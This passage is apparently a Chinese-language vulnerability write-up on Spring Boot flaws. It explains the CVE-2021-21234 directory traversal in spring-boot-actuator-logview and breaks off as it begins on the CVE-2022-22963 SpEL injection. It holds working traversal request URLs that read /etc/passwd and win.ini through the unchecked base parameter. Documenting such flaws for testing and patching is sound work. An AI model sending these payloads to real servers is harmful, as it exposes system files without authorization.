Spring Boot 目录遍历--表达式注入--代码执行--(CVE-2021-21234)&&(CVE-2022-22963)&&(CVE-2022-22947)&&(CVE-2022-2296)
Spring Boot 目录遍历 (CVE-2021-21234)
漏洞简介
spring-boot-actuator-logview 是一个简单的日志文件查看器作为Spring Boot执行器端点,在 0.2.13 版本之前存在着目录遍历漏洞,编号 CVE-2021-21234。漏洞本质是Spring Boot 执行器通过请求的参数来指定文件名和文件夹路径,经过组合拼接达到目录遍历,虽然源码中检查了文件名(filename)参数来防止目录遍历,但是没有检查文件夹(base)参数,造成了目录遍历
影响范围
spring-boot-actuator-logview < 0.2.13
漏洞复现
Windows:
http:///manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../
http:///log/view?filename=/windows/win.ini&base=../../../../../../../../../../
Linux:
http:///manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../
http:///log/view?filename=/etc/passwd&base=../../../../../../../../../../
Spring Cloud Function Spel表达式注入(CVE-2022-22963)
漏洞简介
Spring Cloud Function提供了一个通用的模型,用于在各种平台上部署基于函数的软件,包括像Amazon AWS Lambda这样的 FaaS(函数即服务,function as a service)平台。
影响范围
3.0.0.RELEASE |